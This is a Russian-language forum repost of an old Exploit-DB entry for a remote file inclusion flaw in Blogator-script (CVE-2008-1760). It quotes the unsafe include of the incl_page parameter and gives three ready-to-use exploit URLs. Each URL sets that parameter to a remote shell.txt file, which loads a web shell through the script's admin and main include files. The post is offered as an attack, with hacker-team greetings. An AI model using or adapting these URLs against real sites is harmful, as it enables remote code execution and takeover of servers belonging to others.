Exploit Blogator-script 0.95 - 'incl_page' Remote File Inclusion

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
5365
Проверка EDB
  1. Пройдено
Автор
JIKO
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2008-1760
Дата публикации
2008-04-04
Код:
-------------------------------------------------------------------------
  --          JIKI Team [ JIKO + KIl1er ]        ---
-------------------------------------------------------------------------
# Author  : jiko
# email  : [email protected]
# Home   : www.no-back.org
# Script  : Blogator-script  Version 2
# Bug   : Remote File Inclusion
# Download  : http://www.blogator-script.com/telecharger.php
# file  : struct_admin.php & struct_admin_blog.php  & struct_main.php
# Eror  :
   <? include($incl_page); ?>
=========================JIkI Team===================
# Exploit  :
 
  http://localhost/[script]/_blogadata/include/struct_admin.php?incl_page=http://localhost/shell.txt?
http://localhost/[script]/_blogadata/include/struct_admin_blog.php?incl_page=http://localhost/shell.txt?
http://localhost/[script]/_blogadata/include/struct_main.php?incl_page=http://localhost/shell.txt?
=========================JIKI Team===================
 greetz : all my friend and H-T Team 
-------------------------------------------------------------------------
  --            JIKI Team [ JIKO + KIl1er ]    --
-------------------------------------------------------------------------

# milw0rm.com [2008-04-04]
 
Источник
www.exploit-db.com

Похожие темы